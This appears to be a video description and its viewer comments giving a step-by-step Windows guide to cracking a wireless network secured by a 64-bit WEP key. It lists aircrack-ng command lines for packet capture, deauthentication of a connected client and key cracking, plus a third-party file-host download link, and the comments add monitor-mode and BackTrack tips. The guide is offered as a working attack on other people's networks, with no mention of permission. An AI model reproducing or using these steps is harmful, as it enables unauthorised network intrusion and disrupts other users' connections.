You must be disconnected from every network to do this.
Doesn't work on every wireless card unfortunately.
You must download both programs linked below

Showing you how to hack wireless network secured by a 64bit WEP key
2 programs. Net stumbler and Aircrack -ng
link:
http://www.netstumbler.com/downloads/
http://www.mediafire.com/?hlrtq0mhxg85ac4

Drivers for wireless card:
http://www.aircrack-ng.org/doku.php?id=install_drivers

Command lines I used.

Command Prompt One:

C:\aircrack\airserv-ng -d "commview.dll|debug"

Command Prompt Two:

C:\aircrack\airodump-ng -c 11 -w C:\aircrack\wpatst 127.0.0.1:666

-c 11 represents the channel the airodump will scan.

Command Prompt Three:

C:\aircrack\aireplay-ng -0 9 -a BSSID of WAP -c BSSID of Client 127.0.0.1:666

-0 puts aireplay in DeAuth mode, 9 represents how many DeAuth
packets it will send.
-a represents the BSSID of the Wireless Access Point (WAP)
and -c represents the BSSID of the
client connected to that WAP.

Command Prompt Four:

C:\aircrack\aircrack-ng -a 1 C:\aircrack\wpatst-22.cap

1 represents WEP mode, and then put the directory of the capture file

Note: 22 is not default, its just in my readme, change it to suit.

  • you need <<back|track 5

  • @Firesnake257 does it work with linux?

  • @nathanac2013 from there install it to a flash drive u can find the tool for that at pendrivelinux and then restart ur computer from the flash drive

  • the easier way to do it go to

    backtrack-linux(dot)org/downloads/

  • @nathanac2013 nvm that statement those arent built in like they are in linux

  • thats what your using stumbler for , why not put it in monitoring mode (better prepares the whole process as well ) airmon-ng

    airmon-ng wlan1(if called wlan1) -start

airodump-ng (this is what stumbler did and can b connected to network )

but dont forget since on windows the begining with c:/aircrack/

  • @SmithTEK11111000100 Perhaps look into CompTIA network+ and security+ certification.
